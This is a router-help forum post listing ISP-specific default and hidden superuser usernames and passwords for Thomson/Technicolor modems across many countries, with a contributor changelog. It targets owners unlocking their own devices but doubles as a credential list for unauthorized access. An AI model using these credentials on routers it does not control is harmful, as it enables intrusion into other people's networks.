TG787:
Username: microuser
Password: !C0nf16,M30
MLAP: root
Username: sumeo
Password: m30acc355 (r8.4.2.Q: bfd,10ng)
MLAP: SuperUser
Username: Administrator
Password: 3!play
MLAP: Administrator

Quote:
Netia VDSL2 IPTV, Poland
TG789vn:
Username: netia
Password: (Modem Access Code) (found on label attached to router)
MLAP: SuperUser

Quote:
Netvigator, Asia
TG789Pvn r8.4.D.D:
Username: Administrator
Password: super-adminpccw
MLAP: ???

Quote:
`CRF43' (ISP unknown), New Zealand
TG789vn r8.4.2.U:
Username: Administrator
Password: P1pLi7e42
MLAP: Administrator

Username: Customer
Password: (blank) (no password)
MLAP: User

Quote:
O2 Broadband, UK
ST-780WL:
TG585v7:
Username: SuperUser
Password: O2Br0ad64nd
MLAP: SuperUser

Username: admin
Password: (blank) (no password)
MLAP: Administrator
Notes: default MLAP permissions have been heavily customised on this box; the 'Administrator', as one example, cannot access Telnet.

Quote:
Online, NL
TG712:
Username: online
Password: (blank) (no password)
MLAP: onlineUSER
Username: TGupgrade712ONL
Password: duvZM8MUez2xDSbwg
MLAP: upgrade

Quote:
PlusNET, UK
TG585v7:
early:
Username: Administrator
Password: (Serial Number) (printed on the product label, usually fixed to the base)
late:
Username: admin
Password: (Serial Number) (printed on the product label, usually fixed to the base)
middle:
Username: Administrator
Password: (blank) (no password)
MLAP: Administrator

Notes: if this is first setup, check the address bar: it may have sent you to the PlusNET registration page, and is asking for the PlusNET DSL (Broadband) username/password. Try entering the router Home page address directly (this is the local-LAN address: http://192.168.1.254/).

Quote:
Qtel, Qatar
All routers:
Username: Administrator
Password: connect2th
MLAP: Administrator

Quote:
T-Com, Croatia
TG782:
Username: Administrator
Password: !tc0Mht[ modem_access_code ], ie. if modem_access_code is 1234567890, password will be !tc0Mht1234567890
MLAP: Administrator

T-Home, Macedonia
TG782:
Username: Administrator
Password: CPE.hgw.12
MLAP: Administrator

Quote:
Telekom Austria
TG585 v7:
Username: Administrator
Password: (blank) (no password)
MLAP: Administrator
(Notes: credentials for TG789vn, TG787v, ST585v6 + ST546v6 are believed to be identical)

Quote:
Telepac, Portugal
TG784n:
Username: telepac
Password: telepac
MLAP: Administrator

Quote:
TeliaSonera, Finland
(2011-02-09 note: Sonera are making these passwords ineffective + switching off Telnet; switch off CWMP to stop that happening to you. Thanks to aziztcf for the update)

TG784:
Username: Sonera
Password: S0neRa07
MLAP: SuperUser
Username: admin
Password: S0neRa07
MLAP: Administrator
Username: Administrator
Password: (blank) (no password)
MLAP: LAN_Admin

Telia, Sweden
TG784:
TG787:
(early firmware):
Username: Telia
Password: stanisskohag
MLAP: SuperUser

Username: Kund
Password: SmartKUND
MLAP: Administrator

Username: Administrator
Password: (blank) (no password)
MLAP: LAN_Admin

r8.8.B.A firmware:
Username: Aqi47sEL
Password: 2UMT9lfy
MLAP: SuperUser

TG789vn:
r8.8.B.6 firmware:
Username: Aqi47sEL
Password: 2UMT9lfy
MLAP: SuperUser

Username: Administrator
Password: (blank) (no password)
MLAP: LAN_Admin

r8.8.B.A firmware:
Username: Sonera
Password: d48Fep4P
MLAP: SuperUser

Username: Administrator
Password: (blank) (no password)
MLAP: LAN_Admin (defuser)

Username: UserAgent
Password: !#13qeadzc24WR
MLAP: LAN_Admin (deflocadmin)

Quote:
Telstra / Bigpond, Australia

Note: The Telstra default access IP is 10.0.0.138, as opposed to the normal POTS access IP of 192.168.1.254.

Most models:
Username: admin
Password: (blank) (no password)
MLAP: Administrator
Some older models (eg ST536v6):
Username: admin
Password: admin
MLAP: Administrator

Quote:
Tiscali, Italy
TG784 Firmware: r8.6.H.1:
Username: roott
Password: r00t_th0ms_n
MLAP: ?

Quote:
Vodafone PT, Portugal (`Vodafone Portugal Fiber to Home Technology')
TG585v7:
TG784:
Username: upgrade
Password: Th0ms0n!
MLAP: ?

I shall add to these as I find/get sent them.

2014-03-29: added Cyta tg782 - thanks to releu -AK
2013-06-07: added Telia tg784 r.8.8.B.A - thanks to riomod -AK
2013-02-04: added (unknown) New Zealand ISP - thanks to frm1912 -AK
2013-01-31: added Lattelecom, Latvia - thanks to AndyTheLatvian -AK
2012-11-07: added Telepac, Portugal - thanks to gentlegiant -AK
2012-10-01: added Telia r8.8.B.A (Sonera SMART 2.2.2) - thanks to neryba -AK
2012-09-19: added Oz device details - thanks to Revs Per Mins -AK
2012-08-21: added TG585v7 for Meine Medien, Austria - thanks to MH forum post -AK
2012-08-20: added TG585v7 for Telekom Austria - thanks to MH forum post; AFAIK same credentials for TG789vn, TG787v, ST585v6 + ST546v6 -AK
2012-08-09: added TG799vn for Maxis FTTH, Malaysia - thanks to forum post -AK
2012-07-19: added TG582n for Claro (Puerto Rico) - thanks to testdummy -AK
2011-12-16: added TG787 to the TG784 for Telia, Sweden - thanks to ener_dk -AK
2011-10-05: added Tiscali, Italy info for the TG784 - thanks to chaos.entalpico -AK
2011-09-21: added TeliaSonera, Sweden info for the TG789vn - thanks to roosterx -AK
2011-09-21: added Netvigator, Asia info for the TG789Pvn - thanks to hkcw -AK
2011-08-22: added Qtel Qatar info for the TG585v7 & other routers - thanks to mack21sicnarf -AK
2011-07-06: added KPN Netherlands info for the TG789vn - thanks to retlaw01 -AK
2011-06-25: added Netia Poland info - thanks Thradya -AK
2011-04-06: added Online NL info - thanks Ano -AK
2011-02-09: updated Sonera Finland info - thanks aziztcf -AK
2011-01-17: updated MEO IPTV, TG784 r8.4.2.Q firmware, Portugal (via forum post - thanks surrealiz3) -AK
2010-12-23: added Telia, Sweden (via forum post - thanks Laeraren) -AK
2010-11-29: added PlusNET UK (via forum post - thanks amin12345) -AK
2010-11-21: added TeliaSonera Finland, all passwords (via forum post - thanks aziztcf) -AK
2010-11-15: added CYTA-Net Cyprus, 585v7 LAN_Admin (via forum post - thanks r0gu3ptm) -AK
2010-09-09: added Forthnet, Greece, 784 root (via forum post - thanks Frontier) -AK
2010-09-05: added MEO IPTV, Portugal, 784/787 root (via forum post - thanks surrealiz3) -AK
2010-08-25: added MEO IPTV, Portugal, 784 Administrator (via forum post - thanks youngros) -AK
2010-08-17: added CYTA-Net, Cyprus (via forum post below - thanks r0gu3ptm) -AK
2010-08-02: added Vodafone PT, Portugal (via forum post) -AK
2010-04-23: added T-Home, Macedonia (via PM) -AK
2010-04-06: added T-Com, Croatia -AK
2009-06-18: added MEO IPTV, Portugal -AK
_________________
Alex Kemp
Back to top Go down
View user profile http://modem-help.board-directory.net
Sponsored content




PostSubject: Re: Fixing Username & Password Problems   

Back to top Go down
 
Fixing Username & Password Problems
Back to top 
Page 1 of 1
 Similar topics
-
» DARKSEID BAF Problems...
» Photobucket Problems
» Software for solving chess problems / puzzles / endgame studies List
» problems playing build-a-bearville
» Obama vows to tackle VA problems, voices support for Shinseki

Permissions in this forum:You cannot reply to topics in this forum
Modem-Help :: Manufacturers :: Alcatel / Thomson / Technicolor-
Jump to: